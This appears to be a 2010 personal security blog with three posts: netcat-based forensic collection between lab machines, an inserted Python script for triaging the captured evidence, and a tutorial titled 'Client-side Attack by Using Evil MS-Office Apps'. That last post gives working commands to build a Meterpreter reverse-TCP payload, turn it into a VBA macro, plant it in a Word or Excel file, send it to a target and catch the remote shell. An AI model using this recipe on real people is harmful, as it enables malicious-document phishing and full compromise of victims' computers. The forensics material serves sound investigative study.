Monday, July 26, 2010

My Personal Blog Moved!

Dear All,

As of today, my personal blog has been moved to
New posts will be updated as soon as possible.

Thursday, June 24, 2010

Covert Analysis II (Forensics)

On LON-WEB1, open the Event Viewer mmc snap-in, select the System event log, then choose Save Log File As and save the system event log under another name:
Example: C:\Backup\SysEvent-Backup.evt

From LON-WEB1, send the SysEvent-Backup.evt file to the CHFI-XP2 machine:

nc -v 99 < C:\Backup\SysEvent-Backup.evt

From the CHFI-XP2 machine, receive the file:

nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt

To analyze:

On CHFI-XP2, open Event Viewer and load the file to view the events.

Overt Analysis (Forensics)

Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).

Launch mmc with runas:

C:\>runas /user:LON-WEB1\administrator "mmc"

Once mmc has been launched, connect to the evidence machine.

Forensics Acquisition Utility (FAU)

Covert Analysis I (Forensics)

On CHFI-XP2, launch Netcat in Listening Mode:

C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt

On LON-WEB1, launch Netcat in Client Mode:

D:\Forensics\Netcat>date /t | nc 99 -w10
D:\Forensics\Netcat>time /t | nc 99 -w10

D:\Forensics\Netcat>ipconfig /all | nc 99 -w10
D:\Forensics\Netcat>netstat -an | nc 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 99 -w10
D:\Forensics\Netcat>arp -a | nc 99 -w10
D:\Forensics\Netcat>route print | nc 99 -w10
D:\Forensics\Netcat>tasklist | nc 99 -w10

Display registry values:

D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 99 -w10

If you need to run Netcat from a different directory,
call it by its full path, as in the following commands:

D:\Forensics\>cd Sysinternalssuite

D:\Forensics\Sysinternalssuite>pslist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>psloggedon | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>psloglist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>psservice | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>psfile | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>pipelist | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>listdlls | D:\Forensics\Netcat\nc 99 -w10
D:\Forensics\Sysinternalssuite>procfeatures | D:\Forensics\Netcat\nc 99 -w10

MyEvidence.txt is the file that stores the collected evidence. Because the listener appends every command's output with nothing in between, the analyst has to rely on each tool's own header line to tell where one command ends and the next begins.
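An added example (not from the original post) of triaging a MyEvidence.txt capture collected as described above: it recovers the per-command sections from each Windows tool's header line, then pulls out the listening TCP ports and the Run-key entries. The sample capture is constructed, and the marker strings assume XP/2003-era tool output.

```python
import re

# First line each Windows tool prints; used to recover where one command's
# output ends and the next begins, since "nc >>" appends them with no separator.
SECTION_MARKERS = {"Windows IP Configuration": "ipconfig", "Active Connections": "netstat",
                   "Image Name": "tasklist", "HKEY_LOCAL_MACHINE": "reg_run"}

def split_sections(text):
    """Group captured lines by the tool that produced them ('preamble' = date/time)."""
    sections, current = {"preamble": []}, "preamble"
    for line in text.splitlines():
        for marker, name in SECTION_MARKERS.items():
            if line.lstrip().startswith(marker):
                current = name
        sections.setdefault(current, []).append(line)
    return sections

def listening_tcp_ports(netstat_lines):
    """Local TCP ports in LISTENING state, from 'netstat -an' output."""
    hits = (re.match(r"\s*TCP\s+\S+:(\d+)\s+\S+\s+LISTENING", l) for l in netstat_lines)
    return sorted({int(m.group(1)) for m in hits if m})

def run_key_entries(reg_lines):
    """name -> command for each value under the Run key, from 'reg query' output."""
    hits = (re.match(r"\s+(\S.*?)\s+REG_(?:EXPAND_)?SZ\s+(.*\S)", l) for l in reg_lines)
    return {m.group(1): m.group(2) for m in hits if m}

def triage(text):
    """The facts an analyst wants first from a capture like the one described above."""
    s = split_sections(text)
    return {"captured_at": [l.strip() for l in s["preamble"] if l.strip()],
            "listening_tcp": listening_tcp_ports(s.get("netstat", [])),
            "run_entries": run_key_entries(s.get("reg_run", []))}

# Constructed sample of MyEvidence.txt after date, time, netstat and reg query
# have been piped through nc (not a real capture).
SAMPLE_CAPTURE = r"""Mon 06/21/2010
10:15 PM

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:3389      192.168.1.50:50102     ESTABLISHED
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    updater    REG_SZ    C:\Temp\updater.exe
"""
if __name__ == "__main__":
    print(triage(SAMPLE_CAPTURE))
```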

Forensics Useful Links

Tuesday, May 18, 2010

Client-side Attack by Using Evil MS-Office Apps (Excel or Word)

Step 1: Create your own payload

cd /pentest/exploits/framework3

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 X > /tmp/payload.exe

Step 2: Convert your newly created payload to a VBA (Visual Basic for Applications) script

cd /pentest/exploits/framework3/tools

./exe2vba.rb /tmp/payload.exe /tmp/payload.vba

Step 3: Copy and Paste the contents of the payload to your evil file

Open your evil file (Excel or Word). Select Tools > Macro > Visual Basic Editor, paste the contents of payload.vba, then save the file.

Step 4: Send the evil file to your client

Step 5: Wait for the reverse connection from the client

msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST
msf > set LPORT 443
msf > exploit